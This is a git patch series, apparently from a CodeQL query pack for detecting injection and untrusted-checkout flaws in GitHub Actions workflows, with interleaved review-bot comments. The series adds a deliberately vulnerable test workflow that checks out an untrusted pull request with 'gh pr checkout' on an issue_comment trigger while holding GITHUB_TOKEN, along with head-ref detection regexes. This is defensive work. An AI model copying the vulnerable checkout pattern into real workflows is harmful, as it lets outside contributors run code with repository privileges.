@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.profile", "code-injection", "generated"] - - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] + - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index 0f78ea086a6..ca3cb0091e9 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml 
@@ -3,19 +3,19 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.packages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_unit.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.packages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.scope", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.packages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "inputs.coverage", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.excludePackages", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.scope", "code-injection", "generated"] - - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "inputs.packages", 
"code-injection", "generated"] \ No newline at end of file + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_regular.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-k8s-version-and-container-registry.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_integration_per-container-registry.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.packages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_regular.yml", "*", "input.coverage", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.excludePackages", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.scope", "code-injection", "generated"] + - ["werf/werf/.github/workflows/_test_e2e_per-k8s-version.yml", "*", "input.packages", "code-injection", "generated"] \ No newline at end 
of file diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index e2bf8f96fa9..6faf8b90057 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "inputs.tests", "code-injection", "generated"] \ No newline at end of file + - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 4a8500a147e..39b6773a2b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml 
@@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.build-arguments", "code-injection", "generated"] - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.test-arguments", "code-injection", "generated"] - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "inputs.maven-repo-path", "code-injection", "generated"] - - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "inputs.git-log-number", "code-injection", "generated"] \ No newline at end of file + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.maven-repo-path", "code-injection", "generated"] + - ["wildfly/wildfly/.github/workflows/shared-wildfly-build.yml", "*", "input.git-log-number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index 3e362cebc58..cbbce950b41 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml 
@@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.target", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.source", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.prerelease", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "inputs.version", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] - - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "inputs.channel", "code-injection", "generated"] \ No newline at end of file + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.prerelease", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] + - ["yt-dlp/yt-dlp/.github/workflows/build.yml", "*", "input.channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 9e5f6e3541e..48206551bcd 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml 
@@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "inputs.config_file", "code-injection", "generated"] - - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "inputs.test_environment", "code-injection", "generated"] - - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "inputs.test_environment", "code-injection", "generated"] \ No newline at end of file + - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] + - ["zenml-io/zenml/.github/workflows/integration-test-fast.yml", "*", "input.test_environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index 89fbb5dbf70..256ad3f0e04 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "inputs.needs_context", "code-injection", "generated"] \ No newline at end of file + - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index f7ee9b66305..ae408b131e0 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.build_image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/container.yml", "*", "inputs.build_image_name", "code-injection", "generated"] - - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] + - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel From d18c575cd4848c5b68d95f97ab3f8943a7a0ca1f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 17 Apr 2024 11:22:45 +0200 Subject: [PATCH 0178/1267] fix broken models --- .../apache_incubator-kie-tools.model.yml | 4 +-- .../streetsidesoftware_cspell.model.yml | 4 +-- ql/test/library-tests/test.expected | 35 +++++++++++++++++++ 3 files changed, 39 insertions(+), 4 deletions(-) diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 37f3efbeded..2e28ad9e900 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: summaryModel data: - - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] \ No newline at end of file + - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 1f087287d25..70b2c362464 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -5,7 +5,7 @@ extensions: data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all - extensible: summaryModel + pack: githubsecuritylab/actions-all + extensible: summaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index c08d4c824e1..8dfd57567d5 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -399,6 +399,7 @@ sources | dorny/paths-filter | * | output.changes | PR changed files | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | | franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | | jitterbit/get-changed-files | * | output.added | PR changed files | manual | | jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | | jitterbit/get-changed-files | * | output.all | PR changed files | manual | 
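Review bot: The row re-filed under `extensible: summaryModel` in the `apache_incubator-kie-tools.model.yml` hunk has `manual` provenance but sits in `ext/generated/composite-actions/`, so regenerating that directory would presumably overwrite it. If that happened, the taint step from `input.pnpm_filter_string` to `output.pnpm_filter_string` would vanish without an error and show up only as missed code-injection findings. Either move the row to a hand-maintained model file or mark it in place with a comment such as `# manual summary - keep when regenerating this file`. The same applies to the `manual` `input.value` -> `output.value` row in the `streetsidesoftware_cspell.model.yml` hunk that follows. Because the original defect was a six-column summary tuple filed under `sinkModel`, a per-extensible column-count check in whatever produces or loads these files would catch a recurrence earlier than `test.expected` does.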
@@ -408,6 +409,7 @@ sources | jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | | marocchino/on_artifact | * | output.* | Downloaded artifact | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | | tj-actions/branch-names | * | output.current_branch | PR current branch | manual | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | @@ -439,6 +441,7 @@ sources summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | | apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | | ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | | ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | 
@@ -452,14 +455,22 @@ summaries | aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | | aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | | aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | | bobheadxi/deployments | * | input.env | output.env | taint | manual | | bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | | bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | | cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | | coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | | crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | | csexton/release-asset-action | * | input.release-url | output.url | taint | manual | | delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | | frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | | 
frabert/replace-string-action | * | input.string | output.replaced | taint | manual | | game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | 
@@ -469,14 +480,29 @@ summaries | gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | | gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | | gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | | haya14busa/action-cond | * | input.if_false | output.value | taint | manual | | haya14busa/action-cond | * | input.if_true | output.value | taint | manual | | hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | | jsdaniell/create-json | * | input.dir | 
output.successfully | taint | manual | | jsdaniell/create-json | * | input.json | output.successfully | taint | manual | | jsdaniell/create-json | * | input.name | output.successfully | taint | manual | | jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | | larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | | mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | | mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | | mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | 
@@ -484,13 +510,22 @@ summaries | metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | | mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | | mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | | ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | | salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | | shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | | shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | | suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | | timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | 
taint | manual | calls | .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | From bd9cd3eb8680757845031da5e5837277a03a616b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 17 Apr 2024 11:15:59 +0200 Subject: [PATCH 0179/1267] new untrusted checkout step --- ql/lib/ext/sergeysova_jq-action.model.yml | 7 +++++++ ql/src/Security/CWE-829/UntrustedCheckout.ql | 21 ++++++++++++++++++- .../.github/workflows/untrusted_checkout2.yml | 19 +++++++++++++++++ 3 files changed, 46 insertions(+), 1 deletion(-) create mode 100644 ql/lib/ext/sergeysova_jq-action.model.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml new file mode 100644 index 00000000000..8ab1d090b1c --- /dev/null +++ b/ql/lib/ext/sergeysova_jq-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"] + diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 40f6d2fec9e..c9cbb0ab13c 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -66,7 +66,8 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.sha\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.id\\b", "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.number\\b", - "\\bhead\\.sha\\b", "\\bhead\\.ref\\b" + // heuristics + "\\bhead\\.sha\\b", "\\bhead\\.ref\\b", "\\bpr_number\\b", "\\bpr_head_sha\\b" ], _, _) ) } 
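Review bot: The two heuristic entries added to `containsHeadRef`, `\\bpr_number\\b` and `\\bpr_head_sha\\b`, match only the lowercase snake_case spelling, so the same value carried as `PR_NUMBER` (the spelling the new fixture's own "Get PR number" step uses), `pr-number` or `prNumber` is not recognised. If that coverage is wanted, a single case-insensitive entry such as `"(?i)\\bpr[_-]?(number|head_sha)\\b"` covers the common spellings. The `// heuristics` comment should also say that these are naming conventions rather than GitHub context fields, so a match is a hint and can be a false positive. The predicate starts and ends outside this hunk, so how the list is consumed is inferred from the trailing `], _, _)`.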
@@ -121,6 +122,24 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { } } +/** Checkout of a Pull Request HEAD ref using gh within a Run step */ +class GhCheckout extends PRHeadCheckoutStep instanceof Run { + GhCheckout() { + exists(string line | + this.getScript().splitAt("\n") = line and + line.regexpMatch(".*gh\\s+pr\\s+checkout.*") and + ( + containsHeadRef(line) + or + exists(string varname | + containsHeadRef(this.getInScopeEnvVarExpr(varname).getExpression()) and + exists(line.regexpFind(varname, _, _)) + ) + ) + ) + } +} + from Workflow w, PRHeadCheckoutStep checkout where w.isPrivileged() and diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml new file mode 100644 index 00000000000..d9e5d6be670 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -0,0 +1,19 @@ +on: issue_comment + +jobs: + build: + runs-on: ubuntu-latest + steps: + - name: Get PR number + id: pr_number + if: ${{ github.event_name == 'issue_comment'}} + run: | + PR_URL="${{ github.event.issue.pull_request.url }}" + PR_NUMBER=${PR_URL##*/} + echo "number=$PR_NUMBER" >> $GITHUB_OUTPUT + - name: Checkout Pull Request + if: github.event_name == 'issue_comment' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} From afaab8b644e8b99a1d78f278afd7760a2b2f575a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 17 Apr 2024 11:26:21 +0200 Subject: [PATCH 0180/1267] add tests --- ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index dc457c6a8a7..27f6bbca39c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected 
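Review bot: In `GhCheckout`, `exists(line.regexpFind(varname, _, _))` uses the environment variable name as a bare regular expression, so it matches any substring of the line. A variable named `PR` whose value holds a head ref would match a checkout line that only mentions `PR_TITLE` and never dereferences `PR`. Tying the match to an actual shell reference, for example `exists(line.regexpFind("\\$\\{?" + varname + "\\b", _, _))`, removes that class of false positive. The class QLDoc should also state that `.*gh\\s+pr\\s+checkout.*` is a line-level text match and will fire on the command inside a comment or an `echo`. `GitCheckout` begins above the hunk; if it uses the same `regexpFind(varname, …)` idiom (not visible here), the same change applies.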
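Review bot: The new fixture `untrusted_checkout2.yml` exercises only the `pr_number` name heuristic, because no step passes a head ref through `env:`, so the `getInScopeEnvVarExpr` branch of `GhCheckout` has no test. The checkout line reads `needs.should_run_it.outputs.pr_number`, but the job declares no `needs:`, and the value actually produced is `steps.pr_number.outputs.number`. Adding a second checkout step with `env:` containing `PR_REF: ${{ github.event.pull_request.head.ref }}` and `run: gh pr checkout "$PR_REF"` would cover the environment-variable path. Pointing the existing line at `steps.pr_number.outputs.number` would make the fixture internally consistent, though it would then stop matching `\\bpr_number\\b`, so the expected output would need to be re-checked.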
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -18,6 +18,7 @@ | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From d4d3957392a16149b6b7e59a9d66e022439d8f84 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 18 Apr 2024 21:29:14 +0200 Subject: [PATCH 0181/1267] Create test.yml --- .github/workflows/test.yml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 .github/workflows/test.yml diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml new file mode 100644 index 00000000000..8d24f44ed32 --- /dev/null +++ b/.github/workflows/test.yml @@ -0,0 +1,14 @@ +name: Tests +on: + push: + pull_request: + +permissions: {} + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - run: | + codeql test run ql/test From 86cc50971b00ee7444bb6d13cc9483d3ed38480a Mon Sep 17 00:00:00 2001 
